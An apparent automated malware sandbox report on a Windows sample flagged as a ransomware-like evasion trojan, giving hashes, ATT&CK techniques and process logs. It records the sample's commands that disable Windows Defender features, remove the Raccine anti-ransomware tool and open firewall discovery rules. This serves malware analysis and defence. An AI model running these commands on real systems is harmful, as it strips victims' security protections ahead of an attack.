2481bcb7380b038e84a6052a3cc42fab8e791cf1dffaefe783398a843af68c22

Analysis

max time kernel
24s
max time network
148s
platform
windows10_x64
resource
win10v20210410
submitted
28-05-2021 09:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
Size

353KB
MD5

3de060c1a25fb75735767e9450ed797d
SHA1

8c0e899fc89aa8e0201aa8ee4ba41cd05702116e
SHA256

48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698
SHA512

4792c3c919c87269544bbe60b62930059f71421eae0a736113e4472e14cfebf95b16ebc430e441a88655fcb84397d5959367061e59d58deaf26de43915eea37b

Score

10^/10

discovery evasion trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Disables Task Manager via registry modification
evasion
Downloads MZ/PE file
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Modifies file permissions 1 TTPs 14 IoCs

discovery

File Permissions Modification

T1222

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid	process
4976	icacls.exe
4100	icacls.exe
5700	icacls.exe
5084	icacls.exe
4796	icacls.exe
5652	icacls.exe
2828	icacls.exe
4276	icacls.exe
1516	icacls.exe
1764	icacls.exe
4272	icacls.exe
4896	icacls.exe
4844	icacls.exe
4904	icacls.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Kills process with taskkill 64 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
4248	taskkill.exe
4476	taskkill.exe
2936	taskkill.exe
2192	taskkill.exe
4576	taskkill.exe
5212	taskkill.exe
5012	taskkill.exe
3876	taskkill.exe
2288	taskkill.exe
1764	taskkill.exe
6128	taskkill.exe
6068	taskkill.exe
2088	taskkill.exe
5504	taskkill.exe
2188	taskkill.exe
4532	taskkill.exe
5028	taskkill.exe
1240	taskkill.exe
4308	taskkill.exe
5504	taskkill.exe
4104	taskkill.exe
5696	taskkill.exe
5540	taskkill.exe
4484	taskkill.exe
1820	taskkill.exe
4764	taskkill.exe
4764	taskkill.exe
4988	taskkill.exe
3212	taskkill.exe
4776	taskkill.exe
3092	taskkill.exe
5412	taskkill.exe
1228	taskkill.exe
5864	taskkill.exe
4916	taskkill.exe
3928	taskkill.exe
3808	taskkill.exe
5024	taskkill.exe
4948	taskkill.exe
5268	taskkill.exe
4820	taskkill.exe
5168	taskkill.exe
4632	taskkill.exe
4188	taskkill.exe
4500	taskkill.exe
5000	taskkill.exe
6016	taskkill.exe
4480	taskkill.exe
4652	taskkill.exe
5728	taskkill.exe
2248	taskkill.exe
4244	taskkill.exe
4976	taskkill.exe
5220	taskkill.exe
6024	taskkill.exe
5228	taskkill.exe
4520	taskkill.exe
2176	taskkill.exe
5308	taskkill.exe
4660	taskkill.exe
4772	taskkill.exe
5100	taskkill.exe
4912	taskkill.exe
4672	taskkill.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exe

pid process

5064 reg.exe
2184 reg.exe
Runs ping.exe 1 TTPs 6 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXE

pid process

3784 PING.EXE
4464 PING.EXE
4540 PING.EXE
4956 PING.EXE
5552 PING.EXE
5220 PING.EXE

pid	process
5064	reg.exe
2184	reg.exe

pid	process
3784	PING.EXE
4464	PING.EXE
4540	PING.EXE
4956	PING.EXE
5552	PING.EXE
5220	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe

pid	process
3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exepowershell.exetaskkill.exetaskkill.exebq52qigh.exeConhost.exepowershell.exepowershell.exepowershell.exetaskkill.exepowershell.exepowershell.exepowershell.exeConhost.exepowershell.exetaskkill.exeConhost.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
Token: SeDebugPrivilege	3964	powershell.exe
Token: SeDebugPrivilege	2248	taskkill.exe
Token: SeIncreaseQuotaPrivilege	2248	taskkill.exe
Token: SeSecurityPrivilege	2248	taskkill.exe
Token: SeTakeOwnershipPrivilege	2248	taskkill.exe
Token: SeLoadDriverPrivilege	2248	taskkill.exe
Token: SeSystemProfilePrivilege	2248	taskkill.exe
Token: SeSystemtimePrivilege	2248	taskkill.exe
Token: SeProfSingleProcessPrivilege	2248	taskkill.exe
Token: SeIncBasePriorityPrivilege	2248	taskkill.exe
Token: SeCreatePagefilePrivilege	2248	taskkill.exe
Token: SeBackupPrivilege	2248	taskkill.exe
Token: SeRestorePrivilege	2248	taskkill.exe
Token: SeShutdownPrivilege	2248	taskkill.exe
Token: SeDebugPrivilege	2248	taskkill.exe
Token: SeSystemEnvironmentPrivilege	2248	taskkill.exe
Token: SeRemoteShutdownPrivilege	2248	taskkill.exe
Token: SeUndockPrivilege	2248	taskkill.exe
Token: SeManageVolumePrivilege	2248	taskkill.exe
Token: 33	2248	taskkill.exe
Token: 34	2248	taskkill.exe
Token: 35	2248	taskkill.exe
Token: 36	2248	taskkill.exe
Token: SeDebugPrivilege	1240	taskkill.exe
Token: SeDebugPrivilege	3876	bq52qigh.exe
Token: SeDebugPrivilege	2528
Token: SeDebugPrivilege	2476	Conhost.exe
Token: SeDebugPrivilege	3468	powershell.exe
Token: SeDebugPrivilege	3508	powershell.exe
Token: SeDebugPrivilege	1428	powershell.exe
Token: SeDebugPrivilege	3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
Token: SeDebugPrivilege	1764	taskkill.exe
Token: SeDebugPrivilege	4196	powershell.exe
Token: SeDebugPrivilege	4280	powershell.exe
Token: SeDebugPrivilege	4372	powershell.exe
Token: SeDebugPrivilege	4544	Conhost.exe
Token: SeDebugPrivilege	4488	powershell.exe
Token: SeIncreaseQuotaPrivilege	1240	taskkill.exe
Token: SeSecurityPrivilege	1240	taskkill.exe
Token: SeTakeOwnershipPrivilege	1240	taskkill.exe
Token: SeLoadDriverPrivilege	1240	taskkill.exe
Token: SeSystemProfilePrivilege	1240	taskkill.exe
Token: SeSystemtimePrivilege	1240	taskkill.exe
Token: SeProfSingleProcessPrivilege	1240	taskkill.exe
Token: SeIncBasePriorityPrivilege	1240	taskkill.exe
Token: SeCreatePagefilePrivilege	1240	taskkill.exe
Token: SeBackupPrivilege	1240	taskkill.exe
Token: SeRestorePrivilege	1240	taskkill.exe
Token: SeShutdownPrivilege	1240	taskkill.exe
Token: SeDebugPrivilege	1240	taskkill.exe
Token: SeSystemEnvironmentPrivilege	1240	taskkill.exe
Token: SeRemoteShutdownPrivilege	1240	taskkill.exe
Token: SeUndockPrivilege	1240	taskkill.exe
Token: SeManageVolumePrivilege	1240	taskkill.exe
Token: 33	1240	taskkill.exe
Token: 34	1240	taskkill.exe
Token: 35	1240	taskkill.exe
Token: 36	1240	taskkill.exe
Token: SeDebugPrivilege	4480	taskkill.exe
Token: SeDebugPrivilege	732	Conhost.exe
Token: SeDebugPrivilege	4932	taskkill.exe
Token: SeIncreaseQuotaPrivilege	3876
Token: SeSecurityPrivilege	3876

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe

description	pid	process	target process
PID 3896 wrote to memory of 3964	3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	powershell.exe
PID 3896 wrote to memory of 3964	3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	powershell.exe
PID 3896 wrote to memory of 2248	3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	powershell.exe
PID 3896 wrote to memory of 2248	3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	powershell.exe
PID 3896 wrote to memory of 1240	3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	taskkill.exe
PID 3896 wrote to memory of 1240	3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	taskkill.exe
PID 3896 wrote to memory of 2528	3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	powershell.exe
PID 3896 wrote to memory of 2528	3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	powershell.exe
PID 3896 wrote to memory of 3876	3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	bq52qigh.exe
PID 3896 wrote to memory of 3876	3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	bq52qigh.exe
PID 3896 wrote to memory of 2476	3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	Conhost.exe
PID 3896 wrote to memory of 2476	3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	Conhost.exe
PID 3896 wrote to memory of 3468	3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	powershell.exe
PID 3896 wrote to memory of 3468	3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	powershell.exe
PID 3896 wrote to memory of 3508	3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	powershell.exe
PID 3896 wrote to memory of 3508	3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	powershell.exe
PID 3896 wrote to memory of 1428	3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	powershell.exe
PID 3896 wrote to memory of 1428	3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	powershell.exe
PID 3896 wrote to memory of 1764	3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	taskkill.exe
PID 3896 wrote to memory of 1764	3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	taskkill.exe
PID 3896 wrote to memory of 4196	3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	powershell.exe
PID 3896 wrote to memory of 4196	3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	powershell.exe
PID 3896 wrote to memory of 4280	3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	powershell.exe
PID 3896 wrote to memory of 4280	3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	powershell.exe
PID 3896 wrote to memory of 4372	3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	powershell.exe
PID 3896 wrote to memory of 4372	3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	powershell.exe
PID 3896 wrote to memory of 4488	3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	powershell.exe
PID 3896 wrote to memory of 4488	3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	powershell.exe
PID 3896 wrote to memory of 4544	3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	Conhost.exe
PID 3896 wrote to memory of 4544	3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	Conhost.exe
PID 3896 wrote to memory of 4992	3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	Conhost.exe
PID 3896 wrote to memory of 4992	3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	Conhost.exe
PID 3896 wrote to memory of 5064	3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	Conhost.exe
PID 3896 wrote to memory of 5064	3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	Conhost.exe
PID 3896 wrote to memory of 4108	3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	schtasks.exe
PID 3896 wrote to memory of 4108	3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	schtasks.exe
PID 3896 wrote to memory of 4608	3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	sc.exe
PID 3896 wrote to memory of 4608	3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	sc.exe
PID 3896 wrote to memory of 4696	3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	Conhost.exe
PID 3896 wrote to memory of 4696	3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	Conhost.exe
PID 3896 wrote to memory of 3432	3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	Conhost.exe
PID 3896 wrote to memory of 3432	3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	Conhost.exe
PID 3896 wrote to memory of 4332	3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	sc.exe
PID 3896 wrote to memory of 4332	3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	sc.exe
PID 3896 wrote to memory of 4404	3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	sc.exe
PID 3896 wrote to memory of 4404	3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	sc.exe
PID 3896 wrote to memory of 4692	3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	sc.exe
PID 3896 wrote to memory of 4692	3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	sc.exe
PID 3896 wrote to memory of 5100	3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	taskkill.exe
PID 3896 wrote to memory of 5100	3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	taskkill.exe
PID 3896 wrote to memory of 4132	3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	Conhost.exe
PID 3896 wrote to memory of 4132	3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	Conhost.exe
PID 3896 wrote to memory of 2008	3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	Conhost.exe
PID 3896 wrote to memory of 2008	3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	Conhost.exe
PID 3896 wrote to memory of 4480	3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	taskkill.exe
PID 3896 wrote to memory of 4480	3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	taskkill.exe
PID 3896 wrote to memory of 732	3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	Conhost.exe
PID 3896 wrote to memory of 732	3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	Conhost.exe
PID 3896 wrote to memory of 4932	3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	taskkill.exe
PID 3896 wrote to memory of 4932	3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	taskkill.exe
PID 3896 wrote to memory of 4988	3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
PID 3896 wrote to memory of 4988	3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
PID 3896 wrote to memory of 4132	3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	Conhost.exe
PID 3896 wrote to memory of 4132	3896	48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe	Conhost.exe

C:\Users\Admin\AppData\Local\Temp\48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
"C:\Users\Admin\AppData\Local\Temp\48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3896

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3964

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
2⤵
PID:2248

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
2⤵
PID:1240

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
2⤵
PID:2528

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
2⤵
PID:3876

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
2⤵
PID:2476

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3468

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3508

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1428

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4196

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
2⤵
PID:1764

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4280

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
2⤵
PID:4372

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4488

C:\Windows\SYSTEM32\taskkill.exe
"taskkill" /F /IM RaccineSettings.exe
2⤵
PID:4544

C:\Windows\SYSTEM32\reg.exe
"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
2⤵
PID:4992

C:\Windows\SYSTEM32\reg.exe
"reg" delete HKCU\Software\Raccine /F
2⤵
- Modifies registry key
PID:5064

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /DELETE /TN "Raccine Rules Updater" /F
2⤵
PID:4108

C:\Windows\SYSTEM32\sc.exe
"sc.exe" config Dnscache start= auto
2⤵
PID:4608

C:\Windows\SYSTEM32\netsh.exe
"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
2⤵
PID:4696

C:\Windows\SYSTEM32\sc.exe
"sc.exe" config FDResPub start= auto
2⤵
PID:3432

C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SQLTELEMETRY start= disabled
2⤵
PID:4332

